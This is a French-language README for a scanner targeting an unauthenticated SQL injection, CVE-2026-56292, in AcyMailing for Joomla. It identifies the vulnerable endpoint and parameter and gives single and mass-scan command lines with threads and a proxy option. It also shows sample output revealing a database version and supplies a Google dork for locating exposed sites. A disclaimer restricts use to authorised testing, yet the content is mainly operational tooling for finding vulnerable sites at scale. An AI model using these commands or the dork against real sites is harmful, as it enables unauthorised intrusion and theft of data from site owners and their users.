
CVE-2026-56292 - Scanneur d'injection SQL non authentifiée pour AcyMailing pour Joomla
Auteur : nullwhisper
Réservé à la recherche en sécurité autorisée et à la validation de vulnérabilités uniquement.
AcyMailing pour Joomla expose la tâche publique côté front-end frontentityselect::loadEntityFront. Dans les anciennes versions, le paramètre columns est transmis directement dans une requête SQL sans assainissement. Les versions corrigées utilisent acym_secureDBColumn() et renvoient une erreur comme ... not secured.
index.php?option=com_acym&ctrl=frontentityselect&task=loadEntityFrontcolumns.
├── cve_2026_56292_acymailing_sqli.py # single + mass scanner
├── dorks.txt # google dorks
├── TECHNICAL.md # technical write-up
├── requirements.txt
├── LICENSE
└── README.md
pip3 install -r requirements.txt
Cible unique :
python3 cve_2026_56292_acymailing_sqli.py -u http://target/
Scan de masse :
python3 cve_2026_56292_acymailing_sqli.py -l targets.txt -v -T 30 -o vuln.txt
Options :
-u URL single target
-l LIST target list file
-t TIMEOUT request timeout (default 30)
-T THREADS concurrent threads (default 10)
-o OUTPUT output file for vulnerable targets
-v verbose
--proxy PROXY http/https proxy
--patched-output FILE
--error-output FILE
Testé sur une installation AcyMailing v11.0.3 dans un laboratoire local Joomla 5 (mode simulation vulnérable).
[*] Loaded 1 unique target(s)
[1/1] [+] VULNERABLE: http://127.0.0.1:8080/ -> version=10.11.18-MariaDB-ubu2204
[*] Done. Vulnerable: 1 | Patched: 0 | Error/Other: 0 | Total: 1
Voir dorks.txt. Dork principal :
inurl:"index.php?option=com_acym"
Cet outil est réservé aux tests de sécurité et aux recherches autorisés uniquement. Ne l'utilisez pas contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation écrite explicite de test. L'auteur (nullwhisper) n'est pas responsable de l'utilisation abusive ou des dommages causés par ce code.
MIT — voir LICENSE.